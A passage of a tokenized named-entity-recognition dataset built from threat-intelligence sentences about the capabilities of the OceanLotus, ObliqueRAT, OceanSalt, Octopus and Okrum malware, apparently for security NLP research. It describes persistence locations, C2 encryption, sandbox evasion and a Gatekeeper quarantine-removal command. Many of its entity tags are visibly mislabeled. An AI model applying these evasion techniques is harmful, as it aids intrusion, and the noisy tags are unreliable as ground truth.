- "before", - "sending", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "the", - "ability", - "to", - "upload", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "uses", - "a", - "decode", - "routine", - "combining", - "bit", - "shifting", - "and", - "XOR", - "operations", - "with", - "a", - "variable", - "key", - "that", - "depends", - "on", - "the", - "length", - "of", - "the", - "string", - "that", - "was", - "encoded.", - "If", - "the", - "computation", - "for", - "the", - "variable", - "XOR", - "key", - "turns", - "out", - "to", - "be", - "0,", - "the", - "default", - "XOR", - "key", - "of", - "0x1B", - "is", - "used.", - "This", - "routine", - "is", - "also", - "referenced", - "as", - "the", - "`rotate`", - "function", - "in", - "reporting." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "encrypts", - "its", - "strings", - "in", - "RSA256", - "and", - "encodes", - "them", - "in", - "a", - "custom", - "base64", - "scheme", - "and", - "XOR." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "a", - "command", - "to", - "delete", - "a", - "file", - "from", - "the", - "system.", - "OSX_OCEANLOTUS.D", - "deletes", - "the", - "app", - "bundle", - "and", - "dropper", - "after", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "uses", - "the", - "command", - "<code>xattr", - "-d", - "com.apple.quarantine</code>", - "to", - "remove", - "the", - "quarantine", - "file", - "attribute", - "used", - "by", - "Gatekeeper." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "sets", - "the", - "main", - "loader", - "file’s", - "attributes", - "to", - "hidden." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "a", - "command", - "to", - "download", - "and", - "execute", - "a", - "file", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "can", - "create", - "a", - "persistence", - "file", - "in", - "the", - "folder", - "<code>/Library/LaunchAgents</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "running", - "with", - "<code>root</code>", - "permissions,", - "OSX_OCEANLOTUS.D", - "can", - "create", - "a", - "persistence", - "file", - "in", - "the", - "folder", - "<code>/Library/LaunchDaemons</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "changed", - "permissions", - "of", - "a", - "second-stage", - "payload", - "to", - "an", - "executable", - "via", - "<code>chmod</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "disguised", - "it's", - "true", - "file", - "structure", - "as", - "an", - "application", - "bundle", - "by", - "adding", - "special", - "characters", - "to", - "the", - "filename", - "and", - "using", - "the", - "icon", - "for", - "legitimate", - "Word", - "documents." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "uses", - "file", - "naming", - "conventions", - "with", - "associated", - "executable", - "locations", - "to", - "blend", - "in", - "with", - "the", - "macOS", - "TimeMachine", - "and", - "OpenSSL", - "services.", - "Such", - "as,", - "naming", - "a", - "LaunchAgent", - "plist", - "file", - "`com.apple.openssl.plist`", - "which", - "executes", - "OSX_OCEANLOTUS.D", - "from", - "the", - "user's", - "`~/Library/OpenSSL/`", - "folder", - "upon", - "user", - "login." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "used", - "a", - "custom", - "binary", - "protocol", - "over", - "port", - "443", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "used", - "a", - "custom", - "binary", - "protocol", - "over", - "TCP", - "port", - "443", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "uses", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "For", - "network", - "communications,", - "OSX_OCEANLOTUS.D", - "loads", - "a", - "dynamic", - "library", - "(`.dylib`", - "file)", - "using", - "`dlopen()`", - "and", - "obtains", - "a", - "function", - "pointer", - "to", - "execute", - "within", - "that", - "shared", - "library", - "using", - "`dlsym()`." - ], - "ner_tags": [ - "O", - "I-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "a", - "variant", - "that", - "is", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "has", - "used", - "`zlib`", - "to", - "compress", - "all", - "data", - "after", - "0x52", - "for", - "the", - "custom", - "TCP", - "C2", - "protocol." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "encrypts", - "data", - "sent", - "back", - "to", - "the", - "C2", - "using", - "AES", - "in", - "CBC", - "mode", - "with", - "a", - "null", - "initialization", - "vector", - "(IV)", - "and", - "a", - "key", - "sent", - "from", - "the", - "server", - "that", - "is", - "padded", - "to", - "32", - "bytes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "checks", - "a", - "number", - "of", - "system", - "parameters", - "to", - "see", - "if", - "it", - "is", - "being", - "run", - "on", - "real", - "hardware", - "or", - "in", - "a", - "virtual", - "machine", - "environment,", - "such", - "as", - "`sysctl", - "hw.model`", - "and", - "the", - "kernel", - "boot", - "time." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "collects", - "processor", - "information,", - "memory", - "information,", - "computer", - "name,", - "hardware", - "UUID,", - "serial", - "number,", - "and", - "operating", - "system", - "version.", - "OSX_OCEANLOTUS.D", - "has", - "used", - "the", - "<code>ioreg</code>", - "command", - "to", - "gather", - "some", - "of", - "this", - "information." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "can", - "collect", - "the", - "network", - "interface", - "MAC", - "address", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "can", - "use", - "the", - "<code>touch", - "-t</code>", - "command", - "to", - "change", - "timestamps." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "uses", - "a", - "shell", - "script", - "as", - "the", - "main", - "executable", - "inside", - "an", - "app", - "bundle", - "and", - "drops", - "an", - "embedded", - "base64-encoded", - "payload", - "to", - "the", - "<code>/tmp</code>", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "uses", - "Word", - "macros", - "for", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "OSX_OCEANLOTUS.D", - "can", - "also", - "use", - "use", - "HTTP", - "POST", - "and", - "GET", - "requests", - "to", - "send", - "and", - "receive", - "C2", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "break", - "large", - "files", - "of", - "interest", - "into", - "smaller", - "chunks", - "to", - "prepare", - "them", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "has", - "the", - "ability", - "to", - "extract", - "data", - "from", - "removable", - "devices", - "connected", - "to", - "the", - "endpoint." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "has", - "the", - "ability", - "to", - "recursively", - "enumerate", - "files", - "on", - "an", - "infected", - "endpoint." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "copy", - "specific", - "files,", - "webcam", - "captures,", - "and", - "screenshots", - "to", - "local", - "directories." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "has", - "gained", - "execution", - "on", - "targeted", - "systems", - "through", - "luring", - "users", - "to", - "click", - "on", - "links", - "to", - "malicious", - "URLs." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "discover", - "pluggable/removable", - "drives", - "to", - "extract", - "files", - "from." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "check", - "for", - "blocklisted", - "process", - "names", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "gain", - "persistence", - "by", - "a", - "creating", - "a", - "shortcut", - "in", - "the", - "infected", - "user's", - "Startup", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "capture", - "a", - "screenshot", - "of", - "the", - "current", - "screen." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "hide", - "its", - "payload", - "in", - "BMP", - "images", - "hosted", - "on", - "compromised", - "websites." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "halt", - "execution", - "if", - "it", - "identifies", - "processes", - "belonging", - "to", - "virtual", - "machine", - "software", - "or", - "analysis", - "tools." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "has", - "the", - "ability", - "to", - "check", - "for", - "blocklisted", - "computer", - "names", - "on", - "infected", - "endpoints." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "check", - "for", - "blocklisted", - "usernames", - "on", - "infected", - "endpoints." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ObliqueRAT", - "can", - "capture", - "images", - "from", - "webcams", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OceanSalt", - "can", - "delete", - "files", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OceanSalt", - "can", - "extract", - "drive", - "information", - "from", - "the", - "endpoint", - "and", - "search", - "files", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OceanSalt", - "can", - "encode", - "data", - "with", - "a", - "NOT", - "operation", - "before", - "sending", - "the", - "data", - "to", - "the", - "control", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OceanSalt", - "can", - "collect", - "the", - "name", - "and", - "ID", - "for", - "every", - "process", - "running", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OceanSalt", - "has", - "been", - "delivered", - "via", - "spearphishing", - "emails", - "with", - "Microsoft", - "Office", - "attachments." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OceanSalt", - "can", - "collect", - "the", - "computer", - "name", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OceanSalt", - "can", - "collect", - "the", - "victim’s", - "IP", - "address." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "OceanSalt", - "can", - "create", - "a", - "reverse", - "shell", - "on", - "the", - "infected", - "endpoint", - "using", - "cmd.exe.", - "OceanSalt", - "has", - "been", - "executed", - "via", - "malicious", - "macros." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "compressed", - "data", - "before", - "exfiltrating", - "it", - "using", - "a", - "tool", - "called", - "Abbrevia." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Octopus", - "can", - "exfiltrate", - "files", - "from", - "the", - "system", - "using", - "a", - "documents", - "collector", - "tool." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "uploaded", - "stolen", - "files", - "and", - "data", - "from", - "a", - "victim's", - "machine", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "exfiltrated", - "data", - "to", - "file", - "sharing", - "sites." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "can", - "collect", - "information", - "on", - "the", - "Windows", - "directory", - "and", - "searches", - "for", - "compressed", - "RAR", - "files", - "on", - "the", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "can", - "download", - "additional", - "files", - "and", - "tools", - "onto", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "stored", - "collected", - "information", - "in", - "the", - "Application", - "Data", - "directory", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "relied", - "upon", - "users", - "clicking", - "on", - "a", - "malicious", - "attachment", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "been", - "disguised", - "as", - "legitimate", - "programs,", - "such", - "as", - "Java", - "and", - "Telegram", - "Messenger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Octopus", - "achieved", - "persistence", - "by", - "placing", - "a", - "malicious", - "executable", - "in", - "the", - "startup", - "directory", - "and", - "has", - "added", - "the", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "key", - "to", - "the", - "Registry." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "can", - "capture", - "screenshots", - "of", - "the", - "victims’", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "been", - "delivered", - "via", - "spearsphishing", - "emails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "encoded", - "C2", - "communications", - "in", - "Base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "can", - "collect", - "system", - "drive", - "information,", - "the", - "computer", - "name,", - "the", - "size", - "of", - "the", - "disk,", - "OS", - "version,", - "and", - "OS", - "architecture", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "can", - "collect", - "the", - "host", - "IP", - "address", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "can", - "collect", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "used", - "HTTP", - "GET", - "and", - "POST", - "requests", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Octopus", - "has", - "used", - "wmic.exe", - "for", - "local", - "discovery", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "has", - "used", - "a", - "custom", - "implementation", - "of", - "AES", - "encryption", - "to", - "encrypt", - "collected", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "was", - "seen", - "using", - "a", - "RAR", - "archiver", - "tool", - "to", - "compress/decompress", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "was", - "seen", - "using", - "modified", - "Quarks", - "PwDump", - "to", - "perform", - "credential", - "dumping." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum's", - "loader", - "can", - "decrypt", - "the", - "backdoor", - "code,", - "embedded", - "within", - "the", - "loader", - "or", - "within", - "a", - "legitimate", - "PNG", - "file.", - "A", - "custom", - "XOR", - "cipher", - "or", - "RC4", - "is", - "used", - "for", - "decryption." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Data", - "exfiltration", - "is", - "done", - "by", - "Okrum", - "using", - "the", - "already", - "opened", - "channel", - "with", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "B-Purp", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "can", - "identify", - "proxy", - "servers", - "configured", - "and", - "used", - "by", - "the", - "victim,", - "and", - "use", - "it", - "to", - "make", - "HTTP", - "requests", - "to", - "C2", - "its", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum's", - "backdoor", - "deletes", - "files", - "after", - "they", - "have", - "been", - "successfully", - "uploaded", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "has", - "used", - "DriveLetterView", - "to", - "enumerate", - "drive", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Before", - "exfiltration,", - "Okrum's", - "backdoor", - "has", - "used", - "hidden", - "files", - "to", - "store", - "logs", - "and", - "outputs", - "from", - "backdoor", - "commands." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "has", - "built-in", - "commands", - "for", - "uploading,", - "downloading,", - "and", - "executing", - "files", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "was", - "seen", - "using", - "a", - "keylogger", - "tool", - "to", - "capture", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Features", - "B-Purp" - ] - }, - { - "tokens": [ - "Okrum", - "was", - "seen", - "using", - "MimikatzLite", - "to", - "perform", - "credential", - "dumping." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "can", - "establish", - "persistence", - "by", - "adding", - "a", - "new", - "service", - "NtmsSvc", - "with", - "the", - "display", - "name", - "Removable", - "Storage", - "to", - "masquerade", - "as", - "a", - "legitimate", - "Removable", - "Storage", - "Manager." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "mimics", - "HTTP", - "protocol", - "for", - "C2", - "communication,", - "while", - "hiding", - "the", - "actual", - "messages", - "in", - "the", - "Cookie", - "and", - "Set-Cookie", - "headers", - "of", - "the", - "HTTP", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - "establishes", - "persistence", - "by", - "creating", - "a", - ".lnk", - "shortcut", - "to", - "itself", - "in", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum's", - "installer", - "can", - "attempt", - "to", - "achieve", - "persistence", - "by", - "creating", - "a", - "scheduled", - "task." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum's", - "loader", - "can", - "create", - "a", - "new", - "service", - "named", - "NtmsSvc", - "to", - "execute", - "the", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Okrum", - 